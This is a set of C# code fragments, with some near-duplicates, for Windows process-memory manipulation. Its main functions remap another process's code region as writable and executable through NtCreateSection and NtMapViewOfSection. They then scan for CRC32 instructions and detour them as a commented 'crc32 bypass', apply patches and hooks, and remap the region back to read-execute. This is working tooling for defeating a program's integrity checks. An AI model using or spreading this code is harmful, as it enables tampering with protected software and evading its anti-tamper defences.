public bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, MemoryProtectionConstraints flNewProtect, out MemoryProtectionConstraints pflOldProtect) { pflOldProtect = CurrentProtectection; HasChanged = CurrentProtectection != flNewProtect; CurrentProtectection = flNewProtect; return(true); }
public bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, MemoryProtectionConstraints flNewProtect, out MemoryProtectionConstraints pflOldProtect) { pflOldProtect = CurrentProtectection; HasChanged = CurrentProtectection != flNewProtect; CurrentProtectection = flNewProtect; return true; }
public void ExecuteWithProtection(MemoryProtectionConstraints requestedProtection, Action action) { MemoryProtectionConstraints oldProtection = MemoryProtectionConstraints.None; Helper.ThrowWin32ExceptionIfFalse(() => _protection.VirtualProtect(_address, _length, requestedProtection, out oldProtection)); try { action(); } finally { Helper.ThrowWin32ExceptionIfFalse(() => _protection.VirtualProtect(_address, _length, oldProtection, out oldProtection)); } }
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, MemoryProtectionConstraints flNewProtect, out MemoryProtectionConstraints lpflOldProtect);
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, MemoryAllocationType flAllocationType, MemoryProtectionConstraints flProtect);
public static extern Ntstatus NtMapViewOfSection(IntPtr sectionHandle, IntPtr processHandle, ref IntPtr baseAddress, UIntPtr ZeroBits, int commitSize, ref long SectionOffset, ref uint ViewSize, uint InheritDisposition, MemoryAllocationType allocationType, MemoryProtectionConstraints win32Protect);
public static extern Ntstatus NtCreateSection(ref IntPtr sectionHandle, AccessMask DesiredAccess, IntPtr objectAttributes, ref long MaximumSize, MemoryProtectionConstraints SectionPageProtection, SectionProtectionConstraints AllocationAttributes, IntPtr fileHandle);
bool IMemoryProtection.VirtualProtect(IntPtr lpAddress, IntPtr dwSize, MemoryProtectionConstraints flNewProtect, out MemoryProtectionConstraints pflOldProtect) { return(VirtualProtect(lpAddress, dwSize, flNewProtect, out pflOldProtect)); }
private static extern bool VirtualProtect( IntPtr lpAddress, IntPtr dwSize, MemoryProtectionConstraints flNewProtect, out MemoryProtectionConstraints pflOldProtect );
bool IMemoryProtection.VirtualProtect(IntPtr lpAddress, IntPtr dwSize, MemoryProtectionConstraints flNewProtect, out MemoryProtectionConstraints pflOldProtect) { return VirtualProtect(lpAddress, dwSize, flNewProtect, out pflOldProtect); }
public static bool RemapMemoryRegion2(IntPtr processHandle, IntPtr baseAddress, int regionSize, MemoryProtectionConstraints mapProtection) { IntPtr addr = VirtualAllocEx(processHandle, IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); if (addr == IntPtr.Zero) { return(false); } IntPtr copyBuf = VirtualAlloc(IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); IntPtr copyBufEx = VirtualAllocEx(processHandle, IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); byte[] copyBuf2 = new byte[regionSize]; if (!ReadProcessMemory(processHandle, baseAddress, copyBuf, regionSize, out IntPtr bytes)) { return(false); } if (!ReadProcessMemory(processHandle, baseAddress, copyBuf2, regionSize, out bytes)) { return(false); } IntPtr sectionHandle = default; long sectionMaxSize = regionSize; Ntstatus status = NtCreateSection(ref sectionHandle, AccessMask.SECTION_ALL_ACCESS, IntPtr.Zero, ref sectionMaxSize, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE, SectionProtectionConstraints.SEC_COMMIT, IntPtr.Zero); if (status != Ntstatus.STATUS_SUCCESS) { return(false); } status = NtUnmapViewOfSection(processHandle, baseAddress); if (status != Ntstatus.STATUS_SUCCESS) { return(false); } IntPtr viewBase = baseAddress; long sectionOffset = default; uint viewSize = 0; status = NtMapViewOfSection(sectionHandle, processHandle, ref viewBase, UIntPtr.Zero, regionSize, ref sectionOffset, ref viewSize, 2, 0, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); if (status != Ntstatus.STATUS_SUCCESS) { return(false); } if (!WriteProcessMemory(processHandle, viewBase, copyBuf, (int)viewSize, out bytes)) { return(false); } if (!WriteProcessMemory(processHandle, copyBufEx, copyBuf, (int)viewSize, out bytes)) { return(false); } MemoryProtectionConstraints old = MemoryProtectionConstraints.PAGE_NOACCESS; if (!VirtualProtectEx(processHandle, copyBufEx, (int)viewSize, MemoryProtectionConstraints.PAGE_EXECUTE_READ, out old)) { return(false); } if (!VirtualFree(copyBuf, 0, MemFree.MEM_RELEASE)) { return(false); } //crc32 bypass //search for F2 ?? 0F 38 F1 - F2 REX.W 0F 38 F1 /r CRC32 r64, r/m64 RM Valid N.E. Accumulate CRC32 on r/m64. byte[] AoBpattern = { 0xF2, 0x42, 0x0F, 0x38, 0xF1 }; for (long i = 0; i < regionSize; i++) { bool isMatch = true; for (long j = 0; j < AoBpattern.Length; j++) { if (!(copyBuf2[i + j] == AoBpattern[j] || j == 1)) { isMatch = false; break; } } if (isMatch) { Console.WriteLine(((long)baseAddress + i).ToString("X")); detourCRC(processHandle, (long)baseAddress + i, (long)baseAddress, (long)copyBufEx); } } return(true); }
public static bool RemapMemoryRegion(IntPtr processHandle, IntPtr baseAddress, int regionSize, MemoryProtectionConstraints mapProtection) { IntPtr addr = VirtualAlloc(IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); if (addr == IntPtr.Zero) { return(false); } IntPtr copyBuf = VirtualAlloc(IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); if (!ReadProcessMemory(processHandle, baseAddress, copyBuf, regionSize, out IntPtr bytes)) { return(false); } IntPtr sectionHandle = default; long sectionMaxSize = regionSize; Ntstatus status = NtCreateSection(ref sectionHandle, AccessMask.SECTION_ALL_ACCESS, IntPtr.Zero, ref sectionMaxSize, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE, SectionProtectionConstraints.SEC_COMMIT, IntPtr.Zero); if (status != Ntstatus.STATUS_SUCCESS) { return(false); } status = NtUnmapViewOfSection(processHandle, baseAddress); if (status != Ntstatus.STATUS_SUCCESS) { return(false); } IntPtr viewBase = baseAddress; long sectionOffset = default; uint viewSize = 0; status = NtMapViewOfSection(sectionHandle, processHandle, ref viewBase, UIntPtr.Zero, regionSize, ref sectionOffset, ref viewSize, 2, 0, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); if (status != Ntstatus.STATUS_SUCCESS) { return(false); } if (!WriteProcessMemory(processHandle, viewBase, copyBuf, (int)viewSize, out bytes)) { return(false); } if (!VirtualFree(copyBuf, 0, MemFree.MEM_RELEASE)) { return(false); } return(true); }
public static IntPtr RemapMemoryRegion(IntPtr processHandle, IntPtr baseAddress, int regionSize, MemoryProtectionConstraints mapProtection) { IntPtr addr = VirtualAllocEx(processHandle, IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, mapProtection); if (addr == IntPtr.Zero) { return(IntPtr.Zero); } IntPtr copyBuf = VirtualAlloc(IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, mapProtection); IntPtr copyBufEx = VirtualAllocEx(processHandle, IntPtr.Zero, regionSize, MemoryAllocationType.MEM_COMMIT | MemoryAllocationType.MEM_RESERVE, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); byte[] copyBuf2 = new byte[regionSize]; if (!ReadProcessMemory(processHandle, baseAddress, copyBuf, regionSize, out IntPtr bytes)) { return(IntPtr.Zero); } if (!ReadProcessMemory(processHandle, baseAddress, copyBuf2, regionSize, out bytes)) { return(IntPtr.Zero); } IntPtr sectionHandle = default; long sectionMaxSize = regionSize; Ntstatus status = NtCreateSection(ref sectionHandle, AccessMask.SECTION_ALL_ACCESS, IntPtr.Zero, ref sectionMaxSize, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE, SectionProtectionConstraints.SEC_COMMIT, IntPtr.Zero); if (status != Ntstatus.STATUS_SUCCESS) { return(IntPtr.Zero); } status = NtUnmapViewOfSection(processHandle, baseAddress); if (status != Ntstatus.STATUS_SUCCESS) { return(IntPtr.Zero); } IntPtr viewBase = baseAddress; long sectionOffset = default; uint viewSize = 0; status = NtMapViewOfSection(sectionHandle, processHandle, ref viewBase, UIntPtr.Zero, regionSize, ref sectionOffset, ref viewSize, 2, 0, MemoryProtectionConstraints.PAGE_EXECUTE_READWRITE); if (status != Ntstatus.STATUS_SUCCESS) { return(IntPtr.Zero); } if (!WriteProcessMemory(processHandle, viewBase, copyBuf, (int)viewSize, out bytes)) { return(IntPtr.Zero); } if (!WriteProcessMemory(processHandle, copyBufEx, copyBuf, (int)viewSize, out bytes)) { return(IntPtr.Zero); } MemoryProtectionConstraints old = MemoryProtectionConstraints.PAGE_NOACCESS; // apply all request patches ApplyAllPatches(processHandle, baseAddress); //crc32 bypass //search for F2 ?? 0F 38 F1 - F2 REX.W 0F 38 F1 /r CRC32 r64, r/m64 RM Valid N.E. Accumulate CRC32 on r/m64. byte[] AoBpattern = { 0xF2, 0x42, 0x0F, 0x38, 0xF1 }; for (long i = 0; i < regionSize; i++) { bool isMatch = true; for (long j = 0; j < AoBpattern.Length; j++) { if (!(copyBuf2[i + j] == AoBpattern[j] || j == 1)) { isMatch = false; break; } } if (isMatch) { detourCRC(processHandle, (long)baseAddress + i, (long)baseAddress, (long)copyBufEx); } } // NOTE: uncomment if you want to snitch a hook inside the .text before it remaps back from RWX to RX //Console.WriteLine("Patching complete.."); //Console.WriteLine("[!] Press any key to remap and resume proces..."); //Console.ReadKey(); // remap status = NtUnmapViewOfSection(processHandle, baseAddress); if (status != Ntstatus.STATUS_SUCCESS) { return(IntPtr.Zero); } status = NtMapViewOfSection(sectionHandle, processHandle, ref viewBase, UIntPtr.Zero, regionSize, ref sectionOffset, ref viewSize, 2, 0, MemoryProtectionConstraints.PAGE_EXECUTE_READ); if (status != Ntstatus.STATUS_SUCCESS) { return(IntPtr.Zero); } if (!VirtualFree(copyBuf, 0, MemFree.MEM_RELEASE)) { return(IntPtr.Zero); } return(addr); }